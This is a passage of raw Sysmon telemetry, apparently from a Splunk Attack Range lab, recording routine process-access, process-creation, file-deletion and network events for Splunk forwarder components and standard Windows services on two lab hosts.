12:22:49.504{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440099Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.503{42DC5269-CE96-6086-0500-00000000BA01}412368C:\Windows\system32\csrss.exe{42DC5269-0219-6088-B828-00000000BA01}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440098Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.503{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0219-6088-B828-00000000BA01}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440097Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.503{42DC5269-0219-6088-B828-00000000BA01}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000440096Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.474{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA14026F2C789155566785A707D8D9F3,SHA256=C50E25D44B3EA9AD91B00A4DC2DF735F1F662C93104F2D85B5F376F68AFCA56D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440095Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.370{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96DAF474CFC7202176861C8AE6D7FD54,SHA256=345E5DAEC4C27E0266A1DA02F89AE3C0279F005792C53477FA8E07736CCCFF44,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440094Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.116{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440093Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.116{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440092Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.006{42DC5269-0218-6088-B728-00000000BA01}49446872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440128Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.558{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A14E6812AF6C6612E1B10A17481D38E3,SHA256=60C94463259279F0E434FDBC44B79C4ECF82205AE84A473891BD347C3F18B02B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440127Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.558{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E0D42D1917AFDEE793646DA3E5F54EA,SHA256=26E0026B1017F23277206DC537265CB1B3A6C896D9A29DAA8EA211A0E4D2D7CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291354Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:48.524{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50607-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291353Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:50.829{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=581BD96608021FE18B23D1F12C2A8376,SHA256=8086C6D90F60D6399F2CA6639760BE24F074B5D822345E3562334B973974A386,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291352Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:50.229{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A837DA96C6285CE5C9B310AC30E370F0,SHA256=51B30A786EDB72B99706AC10A8A4FA1AD742C5994389E93AE449F5E1A43452A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440126Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.170{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-021A-6088-B928-00000000BA01}5684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440125Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.169{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440124Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.169{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440123Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.169{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440122Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.169{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440121Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.169{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440120Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.169{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440119Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.169{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440118Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.169{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440117Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.168{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440116Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.168{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-021A-6088-B928-00000000BA01}5684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440115Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.168{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-021A-6088-B928-00000000BA01}5684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440114Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.168{42DC5269-021A-6088-B928-00000000BA01}5684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440113Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.117{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440112Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.117{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291355Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:51.845{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D830BA507F75791465A9061C5257BA2E,SHA256=3403886CC44F35E23ADCFD49AB4EF09A8953CC1476CC36C13464811ABE72C377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440150Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.593{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB4AAC16F8F34715180E8682FF3A58DB,SHA256=14C41C60A4016ACAEF47BA3F0AFEEF67F41BE21E8178E622C75A556C8F685E35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440149Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.567{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440148Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 